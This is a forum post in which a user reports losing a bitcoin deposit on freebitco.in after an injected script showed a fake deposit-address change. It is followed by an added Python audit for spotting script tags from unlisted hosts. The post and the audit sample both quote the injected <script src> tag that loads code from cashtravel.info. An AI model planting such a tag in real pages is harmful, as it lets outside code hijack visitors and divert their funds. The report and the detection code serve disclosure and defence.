Board: Scam Accusations
Re: [WARNING] Attack on freebitco.in account
by NK345 on 19/04/2024, 07:18:15 UTC
Hi,

I am one of the users who was SCAMMED by the vulnerability of the FBC site.
Thank you @Zibi321 for explaining it in detail, and I want to add my two cents.

In fact this is what happened to me:
1) I was in the top 10 daily wagerers on 31st March or 1st April.
2) The next day my FBC website showed the message about the changing of address (I didn't take a screenshot, but it was the same as the case reported by Zibi321, only with a different deposit address starting with '3...').
The message was something along the lines of "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee" https://www.talkimg.com/images/2024/04/11/jAWpq.png
I didn't think about it too much, as everything worked normally on the site: I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo, reward points were updating etc., so I assumed this message was just some maintenance / upgrade being done by FBC.
3) On 04 April, I deposited 0.06768 BTC to the new P2SH address (https://ibb.co/NNPjD0w) (TX id: 77d47f1b44cd656776ca0b2be753ebc0234da203e673714d577e382b6a50444a), but never received this amount in my account at FBC. Suspiciously enough, the next day the message for change of deposit address to P2SH disappeared from the site.
4) I wrote several times to the freebitcoin support email, to the FAQ page, as well as to TheQuin, and never received any reply from any of those.
5) Feeling desperate, I joined this forum, where I saw that other users had also faced the same issue and were scammed. I also noticed some abnormal behavior of the site: when I tried to click the generate "new deposit address", nothing happened. You can see it in this video: https://www.youtube.com/watch?v=O7gXJTFnqyw
6) It seems that within the JS script there is an embedded MALICIOUS script, which was identified by user ID482015 in this forum topic: https://bitcointalk.org/index.php?topic=320959.msg63923149#msg63923149 . The malicious script is this:
<option value="<script src=https://cashtravel.info/forum/main.js></script>"><script src="https://cashtravel.info/forum/main.js"></script></option>.   
After I blocked this script with AdBlock, the generate new deposit address is now working normally.
This script however is still not removed from the FBC site: https://ibb.co/L99f2hL

So as a summary, there is a malicious script targeting the high rollers, several people have been scammed by this vulnerability, there is no response from FBC support or TheQuin, the script is still not removed, so the vulnerability is still there, maybe only felt by the targeted audience (high rollers).   

I hope FBC can return the scammed people's money and fix this vulnerability ASAP.  Also support from the community is needed, make it more transparent, otherwise they won't listen to just a few voices.
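
The markup quoted in point 6 can be checked for mechanically. The following is an added example, not part of the original post and not FBC's code: a small audit of saved page HTML that flags script tags loaded from hosts outside an allowlist and attribute values that contain script markup. The sample page and the allowed host cdn.example.com are constructed; only the option line is taken from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}

class ScriptAudit(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=True)
        self.allowed = set(allowed_hosts)
        self.stack = []      # currently open elements
        self.findings = []

    def handle_starttag(self, tag, attrs):
        parent = self.stack[-1] if self.stack else None
        for name, value in attrs:
            # Markup inside an attribute value suggests stored, unescaped input.
            if value and "<script" in value.lower():
                self.findings.append(("markup-in-attribute", tag, name))
        if tag == "script":
            src = dict(attrs).get("src")
            host = urlparse(src).hostname if src else None
            # Relative URLs have no host and are treated as same-origin.
            if host and host not in self.allowed:
                self.findings.append(("unlisted-script-host", host, parent))
        if tag not in VOID:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass

def audit(html, allowed_hosts):
    parser = ScriptAudit(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page; the second <option> line is the one quoted in the post.
SAMPLE = '''<html><body>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<select name="country">
<option value="PL">Poland</option>
<option value="<script src=https://cashtravel.info/forum/main.js></script>"><script src="https://cashtravel.info/forum/main.js"></script></option>
</select>
</body></html>'''

if __name__ == "__main__":
    for finding in audit(SAMPLE, {"cdn.example.com"}):
        print(finding)
```

A site operator can enforce the same allowlist in the browser with a Content-Security-Policy `script-src` directive, which stops a script from an unlisted host from loading even when the markup has been injected.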